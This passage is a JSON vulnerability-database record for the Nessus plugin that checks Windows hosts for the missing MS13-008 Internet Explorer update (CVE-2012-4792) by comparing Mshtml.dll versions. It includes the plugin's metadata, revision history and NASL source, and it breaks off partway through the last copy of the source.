{"id": "SMB_NT_MS13-008.NASL", "bulletinFamily": "scanner", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.", "published": "2013-01-14T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/63522", "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008"], "cvelist": ["CVE-2012-4792"], "type": "nessus", "lastseen": "2019-11-03T12:15:46", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.", "edition": 13, "enchantments": {"dependencies": {"modified": "2019-10-28T21:19:47", "references": [{"idList": ["CVE-2012-4792"], "type": "cve"}, {"idList": ["THN:5ACF233F4E37E6A4975B246F2082107C", "THN:7ACF921BA3C582C8760C348FD2475BC2"], "type": "thn"}, {"idList": ["SMB_KB2794220.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:23754", "EDB-ID:23785"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310902699", "OPENVAS:902699"], "type": "openvas"}, {"idList": ["SMNTC-57070"], "type": "symantec"}, {"idList": ["THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450"], "type": "threatpost"}, {"idList": ["SECURITYVULNS:VULN:12835"], "type": "securityvulns"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF"], "type": "metasploit"}, {"idList": ["1337DAY-ID-20069"], "type": "zdt"}, {"idList": ["SSV:60551"], "type": "seebug"}, {"idList": ["PACKETSTORM:119168", "PACKETSTORM:119186"], "type": "packetstorm"}, {"idList": ["VU:154201"], "type": "cert"}, {"idList": ["SAINT:E4225C669F34358E2FC7EE71D604FA0A", "SAINT:DCB95B394157102378C2A8CADFE280E8", "SAINT:2EF245955FDA0606FF9A743D9132C6A8"], "type": "saint"}]}, "score": {"modified": "2019-10-28T21:19:47", "value": 9.6, "vector": "NONE"}}, "hash": "c4f54d4517682ed35fc8b70b87dcd6cb94a30b4ab114ade0dd8faf6a38ecc1ae", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "6f08f84e3b368ff5e99adc78c0a77eab", "key": "references"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "538d0d1c332ac3dd3e1d9aa41bec0d37", "key": "description"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "61dcfa1ba98bb298fd5d06d3d95c176e", "key": "sourceData"}, {"hash": "528cea5b87bf77107bd9f05291bbffe5", "key": "reporter"}, {"hash": "e8ec5d02e016cac43a330cd6a189f48c", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2019-10-28T21:19:47", "modified": "2019-10-02T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008"], "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 11}, "differentElements": ["modified"], "edition": 13, "lastseen": "2019-10-28T21:19:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing Internet Explorer (IE) Security Update 2799329.\n\nThe installed version of IE is affected by a vulnerability that could allow an attacker to execute arbitrary code on the remote host.", "edition": 10, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "f3161c9ff7fe5f9ade3dbf6305d95c338de94004d15776389459232ec34a8f00", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "6f08f84e3b368ff5e99adc78c0a77eab", "key": "references"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "a6f5bf31886c073e4af45af7488e4877", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "853e90e76cb8bc44659046710a5f8a59", "key": "description"}, {"hash": "61dcfa1ba98bb298fd5d06d3d95c176e", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2018-11-17T02:55:02", "modified": "2018-11-15T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 7}, "differentElements": ["description"], "edition": 10, "lastseen": "2018-11-17T02:55:02"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing Internet Explorer (IE) Security Update 2799329.\n\nThe installed version of IE is affected by a vulnerability that could allow an attacker to execute arbitrary code on the remote host.", "edition": 4, "enchantments": {"score": {"modified": "2017-10-29T13:35:56", "value": 9.3}}, "hash": "e9e75c9c1cd77ca6e45866bdd60694b2f2516275249358705d283341c07cf983", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "dac4d38422aa1f0e6a7e0a88f95b76df", "key": "sourceData"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "a6f5bf31886c073e4af45af7488e4877", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1f6b7bf156020139cfba6367866dc123", "key": "references"}, {"hash": "853e90e76cb8bc44659046710a5f8a59", "key": "description"}, {"hash": "72014d26515cb4955665de28c82623a9", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2017-10-29T13:35:56", "modified": "2017-07-26T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://technet.microsoft.com/library/security/ms13-008"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2017/07/26 20:01:36 $\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_osvdb_id(88774);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\", \"23785\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # 